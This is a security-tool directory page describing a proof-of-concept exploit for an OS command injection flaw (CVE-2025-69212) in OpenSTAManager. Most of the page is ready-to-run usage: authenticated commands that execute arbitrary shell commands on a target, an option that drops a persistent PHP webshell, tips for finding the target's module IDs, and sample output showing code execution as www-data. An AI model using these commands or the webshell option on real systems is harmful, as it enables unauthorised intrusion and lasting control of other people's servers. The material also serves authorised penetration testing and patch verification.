Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - OpenSTAManager OS Command Injection PoC | Kitploit
Tools/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager OS Command Injection PoC

View Repository
482 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-69212 - OpenSTAManager OS Command Injection PoC

Usage

Install dependencies:

root@kitploit:~
pip install -r requirements.txt

Run a single command and print its output:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

Drop a persistent PHP webshell instead:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

Options

FlagDescription
-u, --urlBase URL of the target instance
-U, --usernameUsername for authentication
-P, --passwordPassword for authentication
-c, --commandCommand to execute, output saved to pwn_out.txt
--shellDrop a PHP webshell at files/shell.php instead of running a single command
--id-moduleModule ID for the invoice import feature (default: 14)
--id-pluginPlugin ID for the invoice import feature (default: 48)

id_module and id_plugin are instance-specific. If the defaults do not work, log into the target's web UI, navigate to the electronic invoice import feature, and check the request parameters in your browser's network tab.

Example Output

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
Download Tool